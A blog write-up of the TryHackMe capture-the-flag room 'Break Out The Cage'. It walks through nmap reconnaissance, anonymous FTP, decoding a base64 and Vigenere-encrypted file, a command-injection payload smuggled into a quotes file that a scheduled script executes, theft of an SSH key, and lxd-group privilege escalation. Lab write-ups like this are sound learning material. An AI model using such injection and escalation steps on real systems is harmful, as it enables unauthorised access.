Open in app

Sign in

Write

Sign in

Writeup — THM Break Out The Cage

Jari Laurila
4 min readNov 18, 2020

--

Help Cage bring back his acting career and investigate the nefarious goings on of his agent!

This is a writeup for TryHackMe room Break Out The Cage.

Reconnaissance

Start with nmap scan:

nmap -sC -sV -p- 10.10.3.235                                          130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-18 18:37 EET
Nmap scan report for 10.10.3.235
Host is up (0.059s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             396 May 25 23:33 dad_tasks
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.8.108.247
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dd:fd:88:94:f8:c8:d1:1b:51:e3:7d:f8:1d:dd:82:3e (RSA)
|   256 3e:ba:38:63:2b:8d:1c:68:13:d5:05:ba:7a:ae:d9:3b (ECDSA)
|_  256 c0:a6:a3:64:44:1e:cf:47:5f:85:f6:1f:78:4c:59:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Nicholas Cage Stories
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

There is an anonymous ftp server so let’s check it out. There is a single file dad_tasks:

UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKRWxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQSB5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds

Base 64 decoded this is:

Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl

This is Vigenere encrypted and can be decoded online without key(which is revealed to be namelesstwo).

Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what "information security" is.
In case I forget.... 
_______________________REDACTED_________________

Web server enumeration

Using gobuser the only thing I find is a mp3 with corrupted data (steganography?) in it.

http://10.10.3.235/auditions/must_practice_corrupt_file.mp3

I did try to analyze it with various tools but didn’t find anything.

Linux enumeration

Let’s see if I can login as Weston (the son’s name is on the front page) and the very long password. Yes I can! So time to enumerate the server. Since I know the password, the first thing to check is sudo:

sudo -l
[sudo] password for weston: 
Matching Defaults entries for weston on national-treasure:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser weston may run the following commands on national-treasure:
    (root) /usr/bin/bees

Too bad the program isn’t very useful:

#!/bin/bashwall "AHHHHHHH THEEEEE BEEEEESSSS!!!!!!!!"

While enumerating I notice that I periodically get random Cage quotes using wall so let’s see who is sending them. I find the culprit by doing:

$ find / -user cage 2> /dev/null
/home/cage
/opt/.dads_scripts
/opt/.dads_scripts/spread_the_quotes.py
/opt/.dads_scripts/.files
/opt/.dads_scripts/.files/.quotes

The file is a Python program:

cat spread_the_quotes.py 
#!/usr/bin/env python#Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!)
import os
import randomlines = open("/opt/.dads_scripts/.files/.quotes").read().splitlines()
quote = random.choice(lines)
os.system("wall " + quote)

Can’t write to the file, but I can write to the .quotes file since I’m in the cage group:

$ id
uid=1001(weston) gid=1001(weston) groups=1001(weston),1000(cage)

The last line in the program is vulnerable to command injection so let’s start by making all Cage’s files available to me:

echo "Damn; chmod -R a+rx /home/cage" > .quotes

After the script executes go grab the user flag from /home/cage/Super_Duper_Checklist. And also rm the python script to stop the annoying messages.

Privesc

Start by looking at Cage’s files. There is a folder with email backups /home/cage/email_backup and there is an interesting email:

cat email_3 
From - Cage@nationaltreasure.com
To - Weston@nationaltreasure.comHey SonBuddy, Sean left a note on his desk with some really strange writing on it. I quickly wrote
down what it said. Could you look into it please? I think it could be something to do with his
account on here. I want to know what he's hiding from me... I might need a new agent. Pretty
sure he's out to get me. The note said:__REDACTED__The guy also seems obsessed with my face lately. He came him wearing a mask of my face...
was rather odd. Imagine wearing his ugly face.... I wouldnt be able to FACE that!! 
hahahahahahahahahahahahahahahaahah get it Weston! FACE THAT!!!! hahahahahahahhaha
ahahahhahaha. Ahhh Face it... he's just odd.RegardsThe Legend - Cage

I tried logging on with that or using ROT-13 variants or simple ciphers but no luck logging in as root. Better continue enumeration as cage, so grab his ssh key from /home/cage/.ssh/id_rsa and login as cage. Since we don’t have a password can’t check sudo with password. Doing id we find there is lxd installed:

uid=1000(cage) gid=1000(cage) groups=1000(cage),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)

So let’s grab exploit instructions from here. I’m not going to repeat the instructions since it’s pretty easy to follow. Basically we create a minimal Linux image and create an instance out of it with local file system mounted to a directory with root permissions and then go get the flag from /root/email_backup/email_2.

That’s all folks! — Nicholas Cage

EDIT: After checking how other’s have solved it seems I took the hard route. The intended way would have been to decode the password in the email.

Cybersecurity
Thm Writeup

--

--

Jari Laurila
Jari Laurila

Written by Jari Laurila

7 Followers
3 Following

CTO by day, learning cybersecurity by night.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams